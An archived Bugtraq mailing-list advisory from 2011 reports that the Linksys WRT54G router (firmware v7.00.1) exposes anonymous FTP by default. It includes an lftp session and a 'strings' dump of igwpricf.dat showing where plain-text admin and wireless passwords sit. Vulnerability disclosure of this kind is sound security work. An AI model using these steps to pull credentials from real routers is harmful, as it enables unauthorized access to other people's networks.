lists.openwall.net   lists  /  announce  owl-users  owl-dev  john-users  john-dev  passwdqc-users  yescrypt  popa3d-users  /  oss-security  kernel-hardening  musl  sabotage  tlsify  passwords  /  crypt-dev  xvendor  /  Bugtraq  Full-Disclosure  linux-kernel  linux-netdev  linux-ext4  linux-hardening  linux-cve-announce  PHC 
Open Source and information security mailing list archives
 
Hash Suite: Windows password security audit tool. GUI, reports in PDF.
[<prev] [next>] [day] [month] [year] [list] 
Message-Id: <201104090015.p390Fa8H026718@www5.securityfocus.com>
Date: Fri, 8 Apr 2011 18:15:36 -0600
From: rafdw@...zta.fm
To: bugtraq@...urityfocus.com
Subject: Linksys WRT54G - read router password from file placed on FTP

Environment: Linksys WRT54G - Firmware Version: v7.00.1 


Default settings of Linksys WRT54G allows to get FTP without password:


rafal@...alhost ~ $ lftp 192.168.1.1
lftp 192.168.1.1:~> dir
  size          date       time       name
--------       ------     ------    --------
  956756    Jan-01-2003  02:13:12   ap61.sys          
  224664    Jan-01-2003  02:13:24   igwhtm.dat        
   28528    Jan-01-2003  02:13:26   langpak_en        
   28482    Apr-08-2011  15:36:44   igwpricf.dat      
    2520    Apr-08-2011  15:11:02   nvram.cfg         
    2046    Dec-24-2001  00:02:42   calibra.dat       

lftp 192.168.1.1:~> 


It is possible to download igwpricf.dat file (and another) where plain-text password to web access and wireless network are keeping.


rafal@...alhost ~ $ strings igwpricf.dat
Linksys
IntotoSoft
192.168.50.3
...
Aadmin
PASSWORD
test
best
...
WIRELESS_PASSWORD
...
default
langpak_en
TELNET
HTTP
SMTP
POP3


-----------------
RaFD

Powered by blists - more mailing lists

Powered by Openwall GNU/*/Linux Powered by OpenVZ